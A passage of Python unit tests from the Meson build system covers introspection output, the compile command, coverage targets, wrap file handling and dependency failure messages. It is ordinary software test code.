for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in res1:
if i['name'] == 'cpp_std':
i['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
i['value'] = 'c++14'
if i['name'] == 'buildtype':
i['value'] = 'release'
if i['name'] == 'optimization':
i['value'] = '3'
if i['name'] == 'debug':
i['value'] = False
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string : bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean : False
Another boolean: True
Some string : Hello World
A list : string
1
True
empty list :
A number : 1
yes : YES
no : NO
coma list : a, b, c
Stuff
missing prog : NO
existing prog : ''' + sys.executable + '''
missing dep : NO
internal dep : YES
Plugins
long coma list : alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub : YES
sub2 : NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '186 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '52 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '207 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '42 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '226 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'{{ ' + command + r'_usage.inc }}[\r\n]'
r'.*?'
r'{{ ' + command + r'_arguments.inc }}[\r\n]',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '106 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '229 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '83 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
os.makedirs(os.path.dirname(real_wrap))
# Invalid redirect, filename must have .wrap extension
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrapper
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename cannot be in parent directory
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = ../real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename must be in foo/subprojects/real.wrap
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
wrap = PackageDefinition(redirect_wrap)
# Correct redirect
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrap
'''))
with open(real_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = http://invalid
'''))
wrap = PackageDefinition(redirect_wrap)
self.assertEqual(wrap.get('url'), 'http://invalid')
@skip_if_no_cmake
def test_nested_cmake_rebuild(self) -> None:
# This checks a bug where if a non-meson project is used as a third
# level (or deeper) subproject it doesn't cause a rebuild if the build
# files for that project are changed
testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends')
cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
self.init(testdir)
self.build()
with cmakefile.open('a') as f:
os.utime(str(cmakefile))
self.assertReconfiguredBuildIsNoop()
def test_version_file(self):
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir)
projinfo = self.introspect('--projectinfo')
self.assertEqual(projinfo['version'], '1.0.0')
def test_cflags_cppflags(self):
envs = {'CPPFLAGS': '-DCPPFLAG',
'CFLAGS': '-DCFLAG',
'CXXFLAGS': '-DCXXFLAG'}
srcdir = os.path.join(self.unit_test_dir, '90 multiple envvars')
self.init(srcdir, override_envvars=envs)
self.build()
def test_build_b_options(self) -> None:
# Currently (0.57) these do nothing, but they've always been allowed
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir, extra_args=['-Dbuild.b_lto=true'])
def test_install_skip_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '91 install skip subprojects')
self.init(testdir)
self.build()
main_expected = [
'',
'share',
'include',
'foo',
'bin',
'share/foo',
'share/foo/foo.dat',
'include/foo.h',
'foo/foofile',
'bin/foo' + exe_suffix,
]
bar_expected = [
'bar',
'share/foo/bar.dat',
'include/bar.h',
'bin/bar' + exe_suffix,
'bar/barfile'
]
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() == 'msvc':
main_expected.append('bin/foo.pdb')
bar_expected.append('bin/bar.pdb')
prefix = destdir_join(self.installdir, self.prefix)
main_expected = [Path(prefix, p) for p in main_expected]
bar_expected = [Path(prefix, p) for p in bar_expected]
all_expected = main_expected + bar_expected
def check_installed_files(extra_args, expected):
args = ['install', '--destdir', self.installdir] + extra_args
self._run(self.meson_command + args, workdir=self.builddir)
all_files = [p for p in Path(self.installdir).rglob('*')]
self.assertEqual(sorted(expected), sorted(all_files))
windows_proof_rmtree(self.installdir)
check_installed_files([], all_expected)
check_installed_files(['--skip-subprojects'], main_expected)
check_installed_files(['--skip-subprojects', 'bar'], main_expected)
check_installed_files(['--skip-subprojects', 'another'], all_expected)
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
